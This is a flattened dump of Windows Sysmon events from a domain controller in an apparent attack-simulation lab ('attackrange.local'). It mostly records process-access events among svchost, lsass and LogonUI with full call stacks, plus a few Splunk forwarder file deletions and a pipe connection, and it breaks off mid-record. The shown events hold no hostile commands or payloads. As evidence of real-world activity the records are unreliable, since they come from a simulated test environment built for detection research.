09:21:44.467{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055264Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.467{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055263Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.467{5EBD8912-8CC0-6151-0F00-00000000FD01}3002624C:\Windows\System32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6aa58|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055262Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.467{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055261Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.467{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055260Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.467{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055259Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.467{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055258Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.452{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055257Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.452{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055256Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.452{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055255Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.452{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055254Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.452{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055253Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.452{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055252Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.452{5EBD8912-8CC0-6151-0F00-00000000FD01}3002624C:\Windows\System32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6aa58|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055251Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.452{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055250Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.452{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055249Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.295{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055248Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.295{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055247Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.280{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055246Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.280{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055245Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.264{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DA7C8868A55364FFF7112411512F99B,SHA256=8FE39989CF7EDF2E3E463A9138C619CDBACD1AE004FD312912066F2754808A94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055244Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.264{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DC6D33DAA666F5D8657403954855C18,SHA256=CEB4DB0BFA794E5AD586D9D1EFDE5FC73E9367DB3638740F7F1D31002C64A57E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055243Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.248{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1700-00000000FD01}1396C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055242Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.248{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001055241Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.248{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x80000000000000001055240Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-ConnectPipe2021-09-27 09:21:44.248{5EBD8912-8CC0-6151-0F00-00000000FD01}300\TSVCPIPE-8c67a868-d0aa-4910-80f6-79d88af9fa90C:\Windows\System32\svchost.exe 10341000x80000000000000001055239Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.248{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055238Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 